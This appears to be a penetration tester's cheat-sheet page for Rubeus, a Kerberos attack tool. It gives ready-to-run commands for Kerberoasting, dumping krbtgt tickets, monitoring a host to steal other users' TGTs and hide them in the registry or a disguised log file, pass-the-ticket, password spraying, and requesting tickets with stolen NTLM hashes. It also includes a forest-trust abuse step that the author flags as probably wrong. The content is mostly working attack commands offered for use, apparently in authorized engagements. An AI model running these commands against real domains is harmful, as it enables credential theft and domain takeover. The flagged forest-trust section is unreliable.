Skip to main content

Rubeus.exe

Rubeus is wonderful for playing with hashes and Kerberos tickets.

Kerberoasting attack

rubeus.exe kerberoast /simple /outfile:kerberoast.txt

Dump tickets

rubeus.exe dump /service:krbtgt /nowrap

Monitor mode

This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:

rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR

Monitor mode - save to disk

If for some reason the TGTs won't write to registry, try this to write to disk:

rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log"

Extracting TGTs from registry hives after monitor mode attack

Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.

Grab the TGTs from registry

reg export HKLM\SOFTWARE\MONITOR backup1.reg 

Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.

Pass-the-ticket

rubeus.exe ptt /ticket:xxx

Password spraying

rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt

Request a TGT

rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap

Note: if doing asktgt for a domain controller be sure to use the trailing dollar sign, i.e. DC01$

Request a TGT when abusing forest trusts [ UNDER REVIEW ]

danger

I was working on this in a lab and don't think this section below is right, so ignore it until further review.

If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:

rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap

Describe a ticket

rubeus.exe describe /ticket:base64ticket

This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the describe command the output said KeyType=180 which I learned means credential guard is in place and that ticket won't work anywhere else but the box it came from!